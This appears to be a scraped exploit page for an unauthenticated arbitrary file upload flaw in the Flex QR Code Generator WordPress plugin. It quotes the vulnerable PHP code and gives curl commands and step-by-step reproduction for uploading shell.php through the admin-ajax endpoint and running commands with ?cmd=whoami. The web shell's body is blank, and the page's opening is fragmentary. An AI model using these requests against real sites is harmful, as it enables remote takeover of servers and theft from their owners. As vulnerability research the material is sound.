Share
## https://sploitus.com/exploit?id=1F61B395-FC97-53DF-BBB3-6F2AC548E593
# Flex QR Code Generator ' > shell.php
curl -X POST "https://victimsite.com/wp-admin/admin-ajax.php" \
-F "action=flexqr_update_qr" \
-F "qrId=1" \
-F "qrData={\"data\":\"https://example.com\"}" \
-F "logo=@shell.php"
```
## Details
The vulnerability exists in the `update_qr_code` method of the `FlexQrCodeGenerator` class. The plugin registers AJAX endpoints for unauthenticated users, allowing any visitor to upload arbitrary files that get stored in the WordPress uploads directory.
**Vulnerable code** from [`/qr-code-generator.php:457-589`](https://plugins.trac.wordpress.org/browser/flex-qr-code-generator/trunk/qr-code-generator.php#L457):
```php
public function update_qr_code()
{
if (isset($_POST['qrData']) && isset($_POST['qrId'])) {
// ... validation code ...
// Handle the logo (file upload)
if (isset($_FILES['logo']) && $_FILES['logo']['error'] === UPLOAD_ERR_OK) {
$logo = $_FILES['logo'];
$upload_dir = wp_upload_dir();
$file_ext = pathinfo($logo['name'], PATHINFO_EXTENSION);
$file_name = pathinfo($logo['name'], PATHINFO_FILENAME);
$new_file_name = $file_name . '_' . $qrId . '.' . $file_ext;
$file_path = $upload_dir['path'] . '/' . $new_file_name;
if (move_uploaded_file($logo['tmp_name'], $file_path)) {
// File uploaded successfully
}
}
}
}
```
**File execution** from [`/qr-code-generator.php:504`](https://plugins.trac.wordpress.org/browser/flex-qr-code-generator/trunk/qr-code-generator.php#L504):
```php
if (move_uploaded_file($logo['tmp_name'], $file_path)) {
$logo_url = $upload_dir['url'] . '/' . $new_file_name;
$logo_url = str_replace(home_url(), '', $logo_url);
$update_data['logo_url'] = $logo_url;
}
```
**Unauthenticated access** from [`/qr-code-generator.php:41-42`](https://plugins.trac.wordpress.org/browser/flex-qr-code-generator/trunk/qr-code-generator.php#L41):
```php
add_action('wp_ajax_flexqr_update_qr', [$this, 'update_qr_code']);
add_action('wp_ajax_nopriv_flexqr_update_qr', [$this, 'update_qr_code']);
```
## Manual Reproduction
1. **Identify target** with Flex QR Code Generator plugin installed
2. **Find existing QR code ID**:
```bash
curl -X POST "https://victimsite.com/wp-admin/admin-ajax.php" \
-d "action=flexqr_fetch_qr_code" \
-d "per_page=10" \
-d "page=1"
```
3. **Upload malicious PHP file**:
```bash
echo '' > shell.php
curl -X POST "https://victimsite.com/wp-admin/admin-ajax.php" \
-F "action=flexqr_update_qr" \
-F "qrId=1" \
-F "qrData={\"data\":\"https://example.com\"}" \
-F "logo=@shell.php"
```
4. **Verify upload** by checking the uploads directory for `shell_1.php`
5. **Execute commands** by visiting the uploaded file with `?cmd=whoami`